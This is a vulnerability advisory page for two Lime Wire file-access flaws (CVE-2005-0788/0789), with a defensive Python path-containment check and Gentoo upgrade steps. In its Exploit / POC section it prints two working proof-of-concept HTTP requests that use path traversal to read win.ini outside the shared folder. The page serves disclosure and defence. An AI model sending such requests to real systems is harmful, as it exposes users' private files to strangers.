Lime Wire Multiple Remote Unauthorized Access Vulnerabilities
BID:12802
Info
| Bugtraq ID: | 12802 |
| Class: | Access Validation Error |
| CVE: | CVE-2005-0789 CVE-2005-0788 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 14 2005 12:00AM |
| Updated: | Jul 12 2009 10:56AM |
| Credit: | Kevin Walsh is credited with the discovery of this issue. |
| Vulnerable: | Lime Wire LLC Lime Wire 4.6, 4.4.5, 4.4.4, 4.4.3, 4.4.2, 4.4.1, 4.4, 4.3.3, 4.3.2, 4.3.1, 4.3, 4.2.6, 4.2.5, 4.2.4, 4.2.3, 4.2.2, 4.2.1, 4.2, 4.1.10, 4.1.9, 4.1.8, 4.1.7, 4.1.5, 4.1.4, 4.1.3, 4.1.2, 4.1.1, 4.1, 4.0, 3.9.12, 3.9.11, 3.9.10, 3.9.9, 3.9.8, 3.9.7, 3.9.6 |
| Not Vulnerable: | Lime Wire LLC Lime Wire 4.8.1, 4.8 |
Discussion
Multiple remote unauthorized access vulnerabilities affect Lime Wire. These issues are due to the application failing to securely service malicious requests.
Two issues have been reported; both issues are due to a failure of the application to ensure that file requests for files outside of the application's shared directory are denied.
An attacker may leverage these issues to gain access to potentially sensitive files with the permissions of the unsuspecting user that activated the affected application.
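The missing check described above, as an added example (not Lime Wire's own code, which this page does not show): a Python containment test that denies any request resolving outside the shared directory. `resolve_shared`, `SHARED_ROOT`, the sample share path and the handler model (the text after the URL prefix names a file relative to the share) are assumptions; the first two sample targets are the request lines quoted in the Exploit / POC section.

```python
import ntpath
from urllib.parse import unquote

# Constructed share directory; not taken from the advisory.
SHARED_ROOT = r"C:\Users\alice\Shared"


def resolve_shared(request_target, prefix, shared_root=SHARED_ROOT):
    """Return the file path inside shared_root for a request, or None to deny.

    Assumed handler model: the text after `prefix` names a file relative to
    the share. ntpath applies Windows path rules on any operating system.
    """
    # Drop the query string, then percent-decode exactly once.
    path = unquote(request_target.split("?", 1)[0])
    if not path.startswith(prefix):
        return None
    name = path[len(prefix):]
    if not name or "\x00" in name:
        return None
    # A drive letter or UNC share replaces the root when paths are joined.
    drive, _ = ntpath.splitdrive(name)
    if drive or ntpath.isabs(name):
        return None
    root = ntpath.normpath(shared_root)
    # normpath collapses "..", "." and mixed "/" and "\" separators lexically.
    candidate = ntpath.normpath(ntpath.join(root, name))
    # Final containment test, case-insensitive as on Windows file systems.
    if ntpath.normcase(candidate).startswith(ntpath.normcase(root) + "\\"):
        return candidate
    return None


if __name__ == "__main__":
    samples = [  # first two targets are the request lines quoted on this page
        ("/gnutella/res/C:\\Windows\\win.ini", "/gnutella/res/"),
        ("/magnet10/../../../../../Windows/Win.ini?Simple-test?", "/magnet10/"),
        ("/magnet10/%2e%2e/%2e%2e/secret.txt", "/magnet10/"),   # constructed
        ("/gnutella/res/music/song.mp3", "/gnutella/res/"),     # constructed
    ]
    for target, prefix in samples:
        print(target, "->", resolve_shared(target, prefix) or "DENIED")
```

The comparison is lexical; on a real file system, symbolic links and junctions should also be resolved before the containment test.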
Exploit / POC
No exploit is required to leverage either of these issues. The following proof of concept requests have been provided:
To retrieve the file 'win.ini' by exploiting the first issue the attacker must connect to the affected application over the offending port and issue the following request:
GET /gnutella/res/C:\Windows\win.ini HTTP/1.1
User-Agent: I-AM-AN-ATTACKER/1.0
Host: 0.0.0.0:0
Accept: */*
Connection: Keep-Alive
To retrieve the same file with the second issue the attacker must connect to the affected application over the offending port and issue the following request:
GET /magnet10/../../../../../Windows/Win.ini?Simple-test?
User-Agent: I-AM-AN-ATTACKER/1.0
Host: 0.0.0.0:0
Accept: */*
Connection: Keep-Alive
The following proof of concept exploit, designed to leverage the gnutella file access issue, has been released:
Solution / Fix
Solution:
The vendor has released an update dealing with these issues.
Gentoo Linux has released advisory GLSA 200503-37 dealing with this issue. Gentoo advises that all users upgrade their packages by carrying out the following commands with superuser privileges:
emerge --sync
emerge --ask --oneshot --verbose ">=net-p2p/limewire-4.8.1"
For more information, please see the referenced Gentoo Linux advisory.
Lime Wire LLC Lime Wire 3.9.10, 3.9.11, 3.9.12, 3.9.6, 3.9.7, 3.9.8, 3.9.9, 4.0, 4.1, 4.1.1, 4.1.10, 4.1.2, 4.1.3, 4.1.4, 4.1.5, 4.1.7, 4.1.8, 4.1.9, 4.2, 4.2.1, 4.2.2, 4.2.3, 4.2.4, 4.2.5, 4.2.6, 4.3, 4.3.1, 4.3.2, 4.3.3, 4.4, 4.4.1, 4.4.2, 4.4.3, 4.4.4, 4.4.5, 4.6 (the same fix is listed for each version):
-
Lime Wire LLC Lime Wire 4.8.1
http://www.limewire.com/english/content/downloadfree.shtml
References
- Lime Wire - Features History (Lime Wire LLC)
- Lime Wire Home Page (Lime Wire LLC)